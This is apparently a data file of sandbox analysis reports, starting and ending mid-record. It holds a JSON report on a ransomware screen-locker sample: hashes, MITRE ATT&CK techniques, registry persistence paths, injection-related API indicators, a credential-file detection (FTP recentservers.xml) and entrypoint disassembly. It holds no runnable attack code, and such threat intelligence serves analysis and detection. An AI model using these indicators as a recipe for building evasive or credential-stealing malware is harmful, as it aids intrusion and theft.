FTP credentials location strings", "description": "\"recentservers.xml\" (Indicator: \"recentservers.xml\") in Source: 00000000-00005100.00000001.132927.00352000.00000020.mdmp", "origin": "File/Memory", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1
https://hybrid-analysis.com/sample/07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1
Hybrid Analysis - Infostealers
{"size": 438272, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1", "sha256": "07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1", "av_detect": 93, "vx_family": "Ransom.Screenlocker.Generic", "threat_score": 80, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 112, "processes": [{"uid": "00000000-00004288", "name": "07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe", "normalized_path": "C:\\07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe", "sha256": "07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"SOFTWARE\\Borland\\Delphi\\RTL\" in Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\" in Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" in Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\n \"Software\\Microsoft\\Windows\\CurrentVersion\" in Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\n \"Software\\Microsoft\\Active Setup\\Installed Components\\\" in Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\" in Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\n \"SOFTWARE\\Borland\\Delphi\\RTL\" in Source: 00000000-00004288.00000000.92877.00401000.00000020.mdmp\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\" in Source: 00000000-00004288.00000000.92877.00401000.00000020.mdmp\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" in Source: 00000000-00004288.00000000.92877.00401000.00000020.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\" in Source: 00000000-00004288.00000000.92877.00401000.00000020.mdmp\n \"Software\\Microsoft\\Active Setup\\Installed Components\\\" in Source: 00000000-00004288.00000000.92877.00401000.00000020.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\" in Source: 00000000-00004288.00000000.92877.00401000.00000020.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00004288.00000000.92877.00401000.00000020.mdmp\n \"Software\\Borland\\cales2\" in Source: 00000000-00004288.00000000.92877.01488000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\%OSUSER%5\"\n \"%OSUSER%5\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,mov\tecx, 7,push\t0,push\t0,dec\tecx,jne\t0x409868,push\tecx,push\tebx,mov\teax, 0x4097a8,call\t0x404a54,xor\teax, eax,push\tebp,push\t0x409afa,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,lea\teax, [ebp - 0x14],call\t0x407070,mov\teax, dword ptr [ebp - 0x14],call\t0x403ac4,push\teax,push\t0,push\t0,call\t0x404b80,mov\tebx, eax,call\t0x404bf0,cmp\teax, 0xb7,jne\t0x4098c3,push\tebx,call\t0x404b48,mov\teax, 0x2ee0,call\t0x406e58,jmp\t0x4098c9,push\tebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"RegCreateKeyA\" (Indicator: \"RegCreateKey\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"RegCreateKeyA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"FreeResource\" (Indicator: \"FreeResource\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"FreeResource\" (Indicator: \"FreeResource\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegDeleteKeyA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"RegSetValueExA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetUserNameA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"RegCreateKeyA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetStdHandle\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"WriteProcessMemory\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"VirtualAllocEx\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"CopyFileA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetThreadLocale\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"RtlUnwind\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"CreateRemoteThread\"; File: 